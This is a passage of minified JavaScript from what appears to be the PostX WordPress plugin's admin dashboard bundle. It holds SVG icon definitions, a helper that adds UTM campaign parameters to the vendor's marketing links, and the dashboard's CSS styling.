.4-.6.5-1.2.3-1.9-.1-.7-.6-1.2-1.1-1.5 0 0-1.3-1-1.4-1.1-1.1-.9-2.7-.7-3.6.4l-7.7 9.6c-.3.4-.5 1.1-.3 1.7l.7 2.8c.1.3.4.6.7.6h3c.6 0 1.2-.3 1.6-.8 3.2-4.1 5.1-6.4 6.2-7.8zm-1.5-5.3s1.4 1.1 1.5 1.2c.2.1.4.4.5.6.1.3 0 .5-.1.7 0 .1-.4.6-1.1 1.3L12.3 7l.9-1.2c.4-.4 1-.5 1.5-.1zM8.8 17.8c-.1.1-.3.2-.5.2H5.9l-.5-2.2c0-.2 0-.4.1-.5l5.8-7.2 3.2 2.5c-1.7 2.2-4.1 5.3-5.7 7.2z"})),r.duplicate=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"24",height:"24",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fill:"currentColor",fillRule:"evenodd",d:"M11 9.75c-.69 0-1.25.56-1.25 1.25v9c0 .69.56 1.25 1.25 1.25h9c.69 0 1.25-.56 1.25-1.25v-9c0-.69-.56-1.25-1.25-1.25h-9ZM8.25 11A2.75 2.75 0 0 1 11 8.25h9A2.75 2.75 0 0 1 22.75 11v9A2.75 2.75 0 0 1 20 22.75h-9A2.75 2.75 0 0 1 8.25 20v-9Z",clipRule:"evenodd"}),(0,a.createElement)("path",{fill:"currentColor",fillRule:"evenodd",d:"M4 2.75A1.25 1.25 0 0 0 2.75 4v9A1.25 1.25 0 0 0 4 14.25h1a.75.75 0 0 1 0 1.5H4A2.75 2.75 0 0 1 1.25 13V4A2.75 2.75 0 0 1 4 1.25h9A2.75 2.75 0 0 1 15.75 4v1a.75.75 0 0 1-1.5 0V4A1.25 1.25 0 0 0 13 2.75H4Z",clipRule:"evenodd"})),r.tabLongArrowRight=(0,a.createElement)("svg",{width:"33",height:"8",viewBox:"0 0 33 8",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M32.8536 4.35355C33.0488 4.15829 33.0488 3.84171 32.8536 3.64645L29.6716 0.464466C29.4763 0.269204 29.1597 0.269204 28.9645 0.464466C28.7692 0.659728 28.7692 0.976311 28.9645 1.17157L31.7929 4L28.9645 6.82843C28.7692 7.02369 28.7692 7.34027 28.9645 7.53553C29.1597 7.7308 29.4763 7.7308 29.6716 7.53553L32.8536 4.35355ZM0.5 4V4.5H32.5V4V3.5H0.5V4Z",fill:"currentColor"})),r.saveLine=(0,a.createElement)("svg",{width:"16",height:"16",viewBox:"0 0 16 16",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M3 8.66667L6.33333 12L13 4",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),r.rightAngle=(0,a.createElement)("svg",{width:"24",height:"24",viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M17.9333 12.8C18.4667 12.4 18.4667 11.6 17.9333 11.2L8.6 4.2C7.94076 3.70557 7 4.17595 7 5V19C7 19.824 7.94076 20.2944 8.6 19.8L17.9333 12.8Z",fill:"currentColor"})),r.arrowRight=(0,a.createElement)("svg",{width:"24",height:"24",viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M3 12H20M14 5L21 12L14 19",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),r.arrowLeft=(0,a.createElement)("svg",{width:"24",height:"24",viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M21 12H4M10 5L3 12L10 19",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),r.fiveStar=(0,a.createElement)("svg",{width:"20",height:"20",viewBox:"0 0 20 20",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M9.18029 2.60415C9.5027 1.90962 10.4975 1.90962 10.8199 2.60415L12.6 6.43897C12.7314 6.72197 13.0016 6.91689 13.3134 6.95362L17.5362 7.45111C18.3006 7.54117 18.6078 8.47852 18.043 8.99753L14.9193 11.8678C14.6892 12.0792 14.5862 12.394 14.6473 12.6992L15.4762 16.8444C15.6261 17.5942 14.8215 18.1737 14.1496 17.7999L10.4414 15.7375C10.1673 15.585 9.83291 15.585 9.55876 15.7375L5.8506 17.7999C5.17864 18.1737 4.37404 17.5942 4.52397 16.8444L5.35289 12.6992C5.41393 12.394 5.31093 12.0792 5.08084 11.8678L1.95716 8.99753C1.39232 8.47852 1.69954 7.54117 2.464 7.45111L6.68675 6.95362C6.99858 6.91689 7.26875 6.72197 7.40012 6.43897L9.18029 2.60415Z",stroke:"currentColor",strokeWidth:"1.31579",strokeLinejoin:"round"})),r.knowledgeBase=(0,a.createElement)("svg",{width:"20",height:"20",viewBox:"0 0 20 20",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M4.16667 17.5H15.8333C16.7538 17.5 17.5 16.7538 17.5 15.8333V7.35702C17.5 6.915 17.3244 6.49107 17.0118 6.17851L13.8215 2.98816C13.5089 2.67559 13.085 2.5 12.643 2.5H4.16667C3.24619 2.5 2.5 3.24619 2.5 4.16667V15.8333C2.5 16.7538 3.24619 17.5 4.16667 17.5Z",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M6.6665 7.5L9.99984 7.5",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M6.6665 10L13.3332 10",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M6.6665 12.5L11.6665 12.5",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"})),r.commentCount2=(0,a.createElement)("svg",{width:"20",height:"20",viewBox:"0 0 20 20",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M16.6667 3.33325H3.33341C2.41294 3.33325 1.66675 4.07944 1.66675 4.99992V12.4999C1.66675 13.4204 2.41294 14.1666 3.33341 14.1666H7.08341V17.4999L11.2501 14.1666H16.6667C17.5872 14.1666 18.3334 13.4204 18.3334 12.4999V4.99992C18.3334 4.07944 17.5872 3.33325 16.6667 3.33325Z",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M6.66675 9.16659L6.66675 8.33325",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M10 9.16659L10 8.33325",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M13.3333 9.16659L13.3333 8.33325",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"})),r.customerSupport=(0,a.createElement)("svg",{width:"20",height:"20",viewBox:"0 0 20 20",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M4.1665 7.5C4.1665 4.73857 6.77818 2.5 9.99984 2.5C13.2215 2.5 15.8332 4.73857 15.8332 7.5",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M15.8333 14.1667V15.8334C15.8333 16.7539 15.0872 17.5001 14.1667 17.5001H10",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M3.42064 7.99896L2.038 8.91951C1.80593 9.07401 1.6665 9.33434 1.6665 9.61317V12.0538C1.6665 12.3327 1.80593 12.593 2.038 12.7475L3.42064 13.6681C3.88395 13.9765 4.47696 14.0133 4.97485 13.7645C5.50087 13.5016 5.83317 12.964 5.83317 12.376V9.29101C5.83317 8.70301 5.50087 8.16542 4.97485 7.90253C4.47696 7.65369 3.88395 7.69048 3.42064 7.99896Z",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M15.0248 7.90253C15.5227 7.65369 16.1158 7.69048 16.579 7.99896L17.9617 8.91951C18.1938 9.07401 18.3332 9.33434 18.3332 9.61317V12.0538C18.3332 12.3327 18.1938 12.593 17.9617 12.7475L16.579 13.6681C16.1158 13.9765 15.5227 14.0133 15.0248 13.7645C14.4988 13.5016 14.1665 12.964 14.1665 12.376V9.29101C14.1665 8.70301 14.4988 8.16542 15.0248 7.90253Z",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"})),r.facebook=(0,a.createElement)("svg",{width:"20",height:"20",viewBox:"0 0 20 20",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M4.16667 1.875C2.90101 1.875 1.875 2.90101 1.875 4.16667V15.8333C1.875 17.099 2.90101 18.125 4.16667 18.125H9.51011V12.2281H7.91667V9.86675H9.51011V8.84924C9.51011 6.2191 10.7004 5 13.2825 5C13.7721 5 14.6168 5.09601 14.9624 5.19201V7.33258C14.78 7.31338 14.4632 7.3038 14.0696 7.3038C12.8026 7.3038 12.313 7.78373 12.313 9.03161V9.86675H14.8371L14.4034 12.2281H12.313V18.125H15.8333C17.099 18.125 18.125 17.099 18.125 15.8333V4.16667C18.125 2.90101 17.099 1.875 15.8333 1.875H4.16667Z",fill:"currentColor"})),r.typography=(0,a.createElement)("svg",{viewBox:"0 0 20 20",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("rect",{x:"2.5",y:"2.5",width:"15",height:"15",rx:"1.66667",stroke:"currentColor",strokeWidth:"1.25"}),(0,a.createElement)("path",{d:"M5.83203 7.91671V6.66671C5.83203 6.20647 6.20513 5.83337 6.66536 5.83337H13.332C13.7923 5.83337 14.1654 6.20647 14.1654 6.66671V7.91671M9.9987 5.83337V14.1667M7.91536 14.1667H12.082",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round"})),r.reload=(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M3.43552 16C4.90822 18.9634 7.96628 21 11.5 21C16.4706 21 20.5 16.9706 20.5 12C20.5 7.02944 16.4706 3 11.5 3C7.96628 3 4.90822 5.03656 3.43552 8M8.5 8.5H3V3",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),r.border=(0,a.createElement)("svg",{viewBox:"0 0 20 20",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M8.33398 2.5H11.6673",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round"}),(0,a.createElement)("path",{d:"M2.5 11.6666L2.5 8.33329",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round"}),(0,a.createElement)("path",{d:"M8.33398 17.5H11.6673",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round"}),(0,a.createElement)("path",{d:"M17.5 11.6666L17.5 8.33329",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round"}),(0,a.createElement)("path",{d:"M5 2.5H4.16667C3.24619 2.5 2.5 3.24619 2.5 4.16667V5",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round"}),(0,a.createElement)("path",{d:"M5 17.5H4.16667C3.24619 17.5 2.5 16.7538 2.5 15.8333V15",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round"}),(0,a.createElement)("path",{d:"M15 2.5H15.8333C16.7538 2.5 17.5 3.24619 17.5 4.16667V5",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round"}),(0,a.createElement)("path",{d:"M15 17.5H15.8333C16.7538 17.5 17.5 16.7538 17.5 15.8333V15",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round"})),r.boxShadow=(0,a.createElement)("svg",{viewBox:"0 0 20 20",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("rect",{x:"2.5",y:"2.5",width:"12.5",height:"12.5",rx:"0.833333",stroke:"currentColor",strokeWidth:"1.25",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M15 5H16.6667C17.1269 5 17.5 5.3731 17.5 5.83333V6.66667",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M5 15V16.6667C5 17.1269 5.3731 17.5 5.83333 17.5H6.66667",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M17.5007 15.8333V16.6666C17.5007 17.1268 17.1276 17.4999 16.6673 17.4999H15.834",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M8.75 17.5H10.2083",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M12.291 17.5H13.7493",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M17.5 8.75V10.2083",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M17.5 12.2916V13.75",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}));const o=r},2044:(e,t,n)=>{"use strict";n.d(t,{Z:()=>r});const a={example:{source:"db-postx-featurename",medium:"block-feature",campaign:"postx-dashboard"},db_hellobar:{source:"db-postx-hellobar",medium:"summer-sale",campaign:"postx-dashboard"},explore_pro_feature:{source:"db-postx-wizard",medium:"explore-features",campaign:"postx-dashboard"},ticket_support:{source:"db-postx-wizard",medium:"ticket-support",campaign:"postx-dashboard"},postx_doc:{source:"db-postx-wizard",medium:"postx-doc",campaign:"postx-dashboard"},addons_popup:{source:"db-postx-addons",medium:"popup",campaign:"postx-dashboard"},builder_popup:{source:"db-postx-builder",medium:"popup-upgrade-pro",campaign:"postx-dashboard"},block_docs:{source:"db-postx-editor",medium:"block-docs",campaign:"postx-dashboard"},blockProFeat:{source:"db-postx-editor",medium:"pro-features",campaign:"postx-dashboard"},blockUpgrade:{source:"db-postx-editor",medium:"block-pro",campaign:"postx-dashboard"},blockPatternPro:{source:"db-postx-editor",medium:"blocks-premade",campaign:"postx-dashboard"},blockProLay:{source:"db-postx-editor",medium:"pro-layout",campaign:"postx-dashboard"},wizardPatternPro:{source:"db-postx-wizard",medium:"core_features-patterns",campaign:"postx-dashboard"},wizardStaterPackPro:{source:"db-postx-wizard",medium:"core_features-SP",campaign:"postx-dashboard"},slider_2:{source:"db-postx-editor",medium:"slider2-pro",campaign:"postx-dashboard"},advanced_search:{source:"db-postx-editor",medium:"adv_search-pro",campaign:"postx-dashboard"},customFont:{source:"db-postx-editor",medium:"custom-font",campaign:"postx-dashboard"},dc:{source:"db-postx-editor",medium:"acf-pro",campaign:"postx-dashboard"},postx_dashboard_settings:{source:"db-postx-setting",medium:"upgrade-pro-sidebar",campaign:"postx-dashboard"},postx_dashboard_tutorials:{source:"db-postx-tutorial",medium:"tutorials-upgrade_to_pro",campaign:"postx-dashboard"},postx_dashboard_tutorialsdocs:{source:"db-postx-tutorial",medium:"tutorials-doc",campaign:"postx-dashboard"},menu_save_temp_pro:{source:"db-postx-save-template",medium:"popup-upgrade",campaign:"postx-dashboard"},settingsFR:{source:"db-postx-setting",medium:"settings-upgrade-pro",campaign:"postx-dashboard"},tutorialsFR:{source:"db-postx-tutorial",medium:"tutorials-FR",campaign:"postx-dashboard"},editor_darklight:{source:"db-postx-editor",medium:"darklight-pro",campaign:"postx-dashboard"},final_hour_sale:{source:"db-postx-hellobar",medium:"final-hour-sale",campaign:"postx-dashboard"},massive_sale:{source:"db-postx-hellobar",medium:"massive-sale",campaign:"postx-dashboard"},flash_sale:{source:"db-postx-hellobar",medium:"flash-sale",campaign:"postx-dashboard"},exclusive_deals:{source:"db-postx-hellobar",medium:"exclusive-deals",campaign:"postx-dashboard"},black_friday_sale:{source:"db-postx-hellobar",medium:"black-friday",campaign:"postx-dashboard"},new_year_sale:{source:"db-postx-hellobar",medium:"new-year-sale",campaign:"postx-dashboard"}},r=e=>{const{url:t,utmKey:n,affiliate:r,hash:o}=e,i=new URL(t||"https://www.wpxpo.com/postx/"),l=a[n];return l&&(i.searchParams.set("utm_source",l.source),i.searchParams.set("utm_medium",l.medium),i.searchParams.set("utm_campaign",l.campaign)),r&&i.searchParams.set("ref",r),o&&(i.hash=o.startsWith("#")?o:`#${o}`),i.toString()}},6511:(e,t,n)=>{"use strict";n.d(t,{Z:()=>u});var a=n(8081),r=n.n(a),o=n(3645),i=n.n(o),l=n(1667),s=n.n(l),p=new URL(n(4975),n.b),c=i()(r()),d=s()(p);c.push([e.id,`.ultp-gettingstart-message{display:grid;grid-template-columns:440px auto;gap:30px;align-items:center;justify-content:space-between}@media only screen and (max-width: 1200px){.ultp-gettingstart-message{grid-template-columns:1fr 1fr}}.ultp-gettingstart-message .ultp-start-left{position:relative;line-height:0;height:100%}.ultp-gettingstart-message .ultp-start-left img{width:100%;height:100%;border-radius:4px}@media only screen and (max-width: 1400px){.ultp-gettingstart-message .ultp-start-left img{object-fit:cover}}.ultp-gettingstart-message .ultp-start-left .ultp-start-content{position:absolute;flex-direction:column;gap:20px;display:flex;bottom:24px;left:24px;line-height:normal}.ultp-gettingstart-message .ultp-start-left .ultp-start-content .ultp-start-text{color:#fff;font-size:18px}.ultp-gettingstart-message .ultp-start-left .ultp-start-content .ultp-start-btns{display:flex;align-items:center;flex-wrap:wrap;gap:12px}.ultp-gettingstart-message .ultp-start-left .ultp-start-content .ultp-start-btns .ultp-primary-button,.ultp-gettingstart-message .ultp-start-left .ultp-start-content .ultp-start-btns .ultp-secondary-button{padding:10px 20px;font-size:14px;border-radius:4px}.ultp-gettingstart-message .ultp-start-left .ultp-start-content .ultp-start-btns .ultp-secondary-button{background:unset;border:1px solid #fff;color:#fff !important;font-weight:600}.ultp-gettingstart-message .ultp-start-left .ultp-start-content .ultp-start-btns .ultp-secondary-button:hover{background:unset}.ultp-gettingstart-message .ultp-start-right{display:grid;grid-template-columns:1fr 1fr;height:100%}@media only screen and (max-width: 1200px){.ultp-gettingstart-message .ultp-start-right{grid-template-columns:1fr}}.ultp-gettingstart-message .ultp-start-right .ultp-dashboard-content{background:#fff;padding:24px 32px;border-radius:0 4px 4px 0;display:flex;flex-direction:column;justify-content:center}@media only screen and (min-width: 1200px)and (max-width: 1360px){.ultp-gettingstart-message .ultp-start-right .ultp-dashboard-content{padding:24px 15px}}.ultp-gettingstart-message .ultp-start-right .ultp-dashboard-content .ultp-title{color:#091f36;font-size:16px;font-weight:600;margin-bottom:8px}.ultp-gettingstart-message .ultp-start-right .ultp-dashboard-content .ultp-title._pro{font-size:20px;margin-bottom:12px}.ultp-gettingstart-message .ultp-start-right .ultp-dashboard-content .ultp-description{margin-bottom:22px}.ultp-gettingstart-message .ultp-start-right .ultp-dashboard-content .ultp-description._pro{color:#070707;margin-bottom:32px}@media only screen and (min-width: 1200px)and (max-width: 1300px){.ultp-gettingstart-message .ultp-start-right .ultp-dashboard-content .ultp-description{display:none}}.ultp-gettingstart-message .ultp-start-right .ultp-dashboard-content .ultp-lists{display:flex;flex-direction:column;gap:5px;margin-bottom:22px}.ultp-gettingstart-message .ultp-start-right .ultp-dashboard-content .ultp-lists .ultp-list{display:flex;align-items:center;gap:7px;color:#070707;font-weight:500;font-size:14px}@media only screen and (min-width: 1200px)and (max-width: 1300px){.ultp-gettingstart-message .ultp-start-right .ultp-dashboard-content .ultp-lists .ultp-list{font-size:12px}}.ultp-gettingstart-message .ultp-start-right .ultp-dashboard-content .ultp-upgrade-btn{background:linear-gradient(180deg, #ea5e40, transparent) #e36f16;padding:12px 25px;border-radius:4px;font-size:14px;margin-bottom:15px;display:flex;align-items:center;gap:10px;width:fit-content;cursor:pointer;text-decoration:none;color:#fff}.ultp-gettingstart-message .ultp-start-right .ultp-dashboard-content .ultp-upgrade-btn:hover{background:linear-gradient(180deg, #e36f16, transparent) #ea5e40}.ultp-gettingstart-message .ultp-dashborad-banner{width:100%;position:relative;line-height:0}@media only screen and (max-width: 1200px){.ultp-gettingstart-message .ultp-dashborad-banner{display:none}}.ultp-gettingstart-message .ultp-dashborad-banner .ultp-play-icon-container{max-width:25%;position:absolute;left:0;right:0;top:0;bottom:0;margin:auto;max-height:fit-content;cursor:pointer;height:fit-content}.ultp-gettingstart-message .ultp-dashborad-banner .ultp-play-icon-container .ultp-play-icon{max-width:100%}.ultp-gettingstart-message .ultp-dashborad-banner .ultp-play-icon-container .ultp-animate{-webkit-animation:pulse 1.2s ease infinite;animation:pulse 1.2s ease infinite;background:var(--postx-primary-color);position:absolute;width:100%;height:100%;left:0;right:0;top:0;bottom:0;margin:auto;border-radius:100%}.ultp-gettingstart-message .ultp-dashborad-banner img.ultp-banner-img{max-width:100%;height:100%;border-radius:4px 0 0 4px}@media only screen and (max-width: 1420px){.ultp-gettingstart-message .ultp-dashborad-banner img.ultp-banner-img{object-fit:cover}}@-webkit-keyframes pulse{0%{opacity:0;transform:scale(1, 1)}50%{opacity:.3}100%{transform:scale(1.5);opacity:0}}@keyframes pulse{0%{opacity:0;transform:scale(1, 1)}50%{opacity:.3}100%{transform:scale(1.5);opacity:0}}.ultp-dashboard-addons-container{display:flex;flex-direction:column;gap:50px}.ultp-dashboard-addons-container .ultp-addon-parent-heading.mt{margin-top:50px}.ultp-dashboard-addons-container .ultp-addon-parent-heading{margin-bottom:32px;color:#070707;font-size:24px;font-weight:600}.ultp-dashboard-addons-container .ultp-addon-parent-heading>span{color:var(--postx-primary-color)}.ultp-dashboard-addons-container .ultp-addons-grid{display:grid;justify-content:space-between;grid-template-columns:1fr 1fr;gap:30px;position:relative}.ultp-dashboard-addons-container .ultp-addons-grid.ultp-gs{grid-template-columns:repeat(2, 1fr)}.ultp-dashboard-addons-container .ultp-addons-grid .ultp-addon-item{display:flex;flex-direction:column;justify-content:space-between;padding:unset !important;position:relative;overflow:hidden;border:1px solid #e6e6e6;border-radius:8px;background:#fbfbfb}.ultp-dashboard-addons-container .ultp-addons-grid .ultp-addon-item img{height:24px}.ultp-dashboard-addons-container .ultp-addons-grid .ultp-addon-item .dashicons{height:unset;width:unset;line-height:unset;font-size:16px}.ultp-dashboard-addons-container .ultp-addons-grid .ultp-addon-item .ultp-new-tag{font-weight:500;font-size:10px;color:#070707;padding:4px 8px;background:#ffbd42;border-radius:24px;padding:4px 8px;height:fit-content;line-height:10px}.ultp-dashboard-addons-container .ultp-addons-grid .ultp-addon-item .ultp-shortcode-copy{cursor:copy}.ultp-dashboard-addons-container .ultp-addons-grid .ultp-addon-item .ultp-addon-item-contents{padding:24px;position:relative}.ultp-dashboard-addons-container .ultp-addons-grid .ultp-addon-item .ultp-addon-item-contents .ultp-addon-item-name{display:flex;gap:12px;align-items:center;margin-bottom:16px}.ultp-dashboard-addons-container .ultp-addons-grid .ultp-addon-item .ultp-addon-item-contents .ultp-addon-item-name .name{font-size:20px}.ultp-dashboard-addons-container .ultp-addons-grid .ultp-addon-item .ultp-addon-item-contents .ultp-addon-item-name .ultp-addon-item-title{font-weight:500;display:flex;align-items:center;gap:8px;line-height:24px}.ultp-dashboard-addons-container .ultp-addons-grid .ultp-addon-item .ultp-addon-item-contents .ultp-pro-lock{position:absolute;top:0;left:0}.ultp-dashboard-addons-container .ultp-addons-grid .ultp-addon-item .ultp-addon-item-contents .ultp-pro-lock span{position:absolute;top:4px;left:2px;font-weight:600;font-size:12px;transform:rotate(315deg);color:#fff}.ultp-dashboard-addons-container .ultp-addons-grid .ultp-addon-item .ultp-addon-item-contents .ultp-pro-lock::after{content:"";width:42px;height:42px;background-image:url(${d});display:block}.ultp-dashboard-addons-container .ultp-addons-container-grid{display:grid;grid-template-columns:auto 360px;gap:32px}.ultp-dashboard-addons-container .ultp-addons-container-grid.ultp-gs{display:block}.ultp-dashboard-addons-container .ultp-addons-container-grid .ultp-addons-items{display:flex;gap:32px;flex-direction:column}.ultp-dashboard-addons-container .ultp-addon-item-actions{display:flex;align-items:center;justify-content:space-between;padding:16px 24px;border-top:1px solid #eaedf2}.ultp-dashboard-addons-container .ultp-addon-item-actions>.ultp-docs-action{display:flex;justify-content:space-between;align-items:center;gap:6px}.ultp-dashboard-addons-container .ultp-addon-item-actions>.ultp-docs-action .ultp-option-tooltip{display:flex;align-items:center;text-decoration:none;gap:6px;border:1px solid #e6e6e6;padding:2px 6px;color:#6e6e6e;font-size:14px;font-weight:500;border-radius:4px;transition:400ms}.ultp-dashboard-addons-container .ultp-addon-item-actions>.ultp-docs-action .ultp-option-tooltip svg{width:14px;height:14px}.ultp-dashboard-addons-container .ultp-addon-item-actions>.ultp-docs-action .ultp-option-tooltip:hover{color:#070707;font-weight:500;border:1px solid #070707}.ultp-dashboard-addons-container .ultp-addon-item-actions>.ultp-docs-action .dashicons,.ultp-dashboard-addons-container .ultp-addon-item-actions>.ultp-docs-action a{font-size:14px;color:#575a5d;cursor:pointer}.ultp-dashboard-addons-container .ultp-addon-item-actions>.ultp-docs-action .dashicons-admin-collapse{transform:rotate(180deg)}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-popup-setting{position:relative;height:20px !important;width:20px !important;margin-left:10px}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-popup-setting svg{color:#6e6e6e;cursor:pointer;opacity:1}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-popup-setting svg:hover{color:#070707}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-popup-setting::before{position:absolute;left:-12px;font-size:30px;top:-13px;border-left:1px solid #eaedf2;padding-left:9px}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-addon-settings{width:150%;height:100vh;background-color:rgba(0,0,0,.5);position:fixed;top:0%;right:10%;transition:.5s;z-index:999}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-addon-settings .ultp-addon-settings-popup{height:100%;width:600px;position:fixed;z-index:99;top:32px;right:0px;margin:0 auto;border-radius:4px;box-sizing:border-box;background-color:var(--postx-white-color);box-shadow:0 1px 2px 0 rgba(8,68,129,.2);overflow-x:hidden;transition:.5s}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-addon-settings .ultp-addon-settings-popup::-webkit-scrollbar{display:none}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-addon-settings .ultp-addon-settings-popup .ultp-addon-settings-title{padding:15px 20px;background:#e3f1ff;position:sticky;top:0;z-index:1}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-addon-settings .ultp-addon-settings-popup form{display:flex;flex-direction:column;justify-content:space-between;height:100%;position:relative}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-addon-settings .ultp-addon-settings-popup form .ultp-addon-settings-body{position:relative;padding:40px 40px 30px}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-addon-settings .ultp-addon-settings-popup form .ultp-addon-settings-footer{text-align:center;background:#e3f1ff;padding:16px;position:sticky;bottom:32px}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-addon-settings .ultp-addon-settings-popup form .ultp-addon-settings-footer .onloading{cursor:no-drop}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-addon-settings .ultp-addon-settings-popup form .ultp-addon-settings-footer .onloading svg{height:14px;width:14px;vertical-align:middle;margin-left:4px;animation:ultp-spin 1s linear infinite;color:#fff}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-addon-settings .ultp-addon-settings-popup form .ultp-addons-setting-save{color:var(--postx-white-color);cursor:pointer;width:600px;border:none;position:fixed;right:0;bottom:0;padding:10px 25px;background:var(--postx-primary-color)}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-addon-settings .ultp-addon-settings-popup .ultp-popup-close{position:fixed;top:40px;right:11px;color:var(--postx-white-color);font-size:25px;cursor:pointer;border:none;padding:0px 9px 3px;background-color:var(--postx-dark-color);z-index:99}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-addon-settings .ultp-addon-settings-popup .ultp-popup-close::after{content:"×"}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-addon-settings .ultp-addon-settings-popup .ultp-popup-close:hover{background:red}.addons_promotions{margin-top:40px;border:1px solid #b9cff0;background-color:#e0ecff;padding:30px;border-radius:4px;text-align:center;font-size:16px;color:#091f36}.addons_promotions.ultp-gs{max-width:80%;margin-left:auto;margin-right:auto}.addons_promotions .addons_promotions_label{line-height:20px;font-size:16px}.addons_promotions .addons_promotions_btns{display:flex;flex-wrap:wrap;justify-content:center;gap:12px;margin-top:15px}.addons_promotions .addons_promotions_btns .addons_promotions_btn{padding:6px 12px;border-radius:4px;cursor:pointer;font-size:12px}.addons_promotions .addons_promotions_btns .addons_promotions_btn.btn1{background:#07cc92;color:#fff;text-decoration:none}.addons_promotions .addons_promotions_btns .addons_promotions_btn.btn2{background:#fff;color:#000;text-decoration:none}.ultp_dash_key_features{margin-top:60px;margin-bottom:30px}.ultp_dash_key_features .ultp_dash_key_features_content{display:grid;grid-template-columns:repeat(4, 1fr);gap:20px;margin-top:30px}.ultp_dash_key_features .ultp_dash_key_features_label{font-size:18px;font-weight:600;margin-bottom:10px;color:#091f36}.ultp_dash_key_features 